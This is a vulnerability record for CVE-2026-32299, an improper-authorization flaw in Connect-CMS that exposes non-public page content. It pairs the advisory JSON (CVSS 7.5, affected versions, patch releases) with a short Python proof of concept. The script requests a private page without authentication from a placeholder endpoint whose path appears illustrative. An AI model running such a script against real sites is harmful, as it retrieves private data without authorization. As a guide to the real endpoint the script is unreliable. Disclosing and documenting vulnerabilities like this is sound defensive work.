CVE-2026-32299

import requests # Target URL (Replace with the actual vulnerable endpoint) target_url = "http://target-cms.com/api/pages/view/{page_id}" # Simulation of exploiting improper authorization to access a private page # In the vulnerable version, authentication is not required (PR:N) page_id = 1 # Example ID of a non-public page try: # Sending request without authentication headers response = requests.get(target_url.format(page_id=page_id)) if response.status_code == 200: print("[+] Vulnerability Confirmed: Successfully retrieved non-public content.") print("Response Snippet:", response.text[:200]) else: print("[-] Exploit failed or content not accessible.") except Exception as e: print(f"[!] Error occurred: {e}")

{"cve": {"id": "CVE-2026-32299", "sourceIdentifier": "[email protected]", "published": "2026-03-23T22:16:27.780", "lastModified": "2026-03-24T20:38:16.723", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "Connect-CMS is a content management system. In versions on the 1.x series up to and including 1.41.0 and versions on the 2.x series up to and including 2.41.0, an improper authorization issue in the page content retrieval feature may allow retrieval of non-public information. Versions 1.41.1 and 2.41.1 contain a patch."}, {"lang": "es", "value": "Connect-CMS es un sistema de gestión de contenido. En versiones de la serie 1.x hasta e incluyendo 1.41.0 y versiones de la serie 2.x hasta e incluyendo 2.41.0, un problema de autorización impropia en la función de recuperación de contenido de página puede permitir la recuperación de información no pública. Las versiones 1.41.1 y 2.41.1 contienen un parche."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "baseScore": 7.5, "baseSeverity": "HIGH", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "HIGH", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-284"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:opensource-workshop:connect-cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.0.0", "versionEndExcluding": "1.41.1", "matchCriteriaId": "60B8BBDF-82BD-486D-AE17-7F59360E62C3"}, {"vulnerable": true, "criteria": "cpe:2.3:a:opensource-workshop:connect-cms:*:*:*:*:*:*:*:*", "versionStartIncluding": "2.0.0", "versionEndExcluding": "2.41.1", "matchCriteriaId": "0C11B4F0-DF29-473A-A285-9DA152DDCDE1"}]}]}], "references": [{"url": "https://github.com/opensource-workshop/connect-cms/releases/tag/v1.41.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/opensource-workshop/connect-cms/releases/tag/v2.41.1", "source": "[email protected]", "tags": ["Release Notes"]}, {"url": "https://github.com/opensource-workshop/connect-cms/security/advisories/GHSA-62ch-j6x7-722j", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}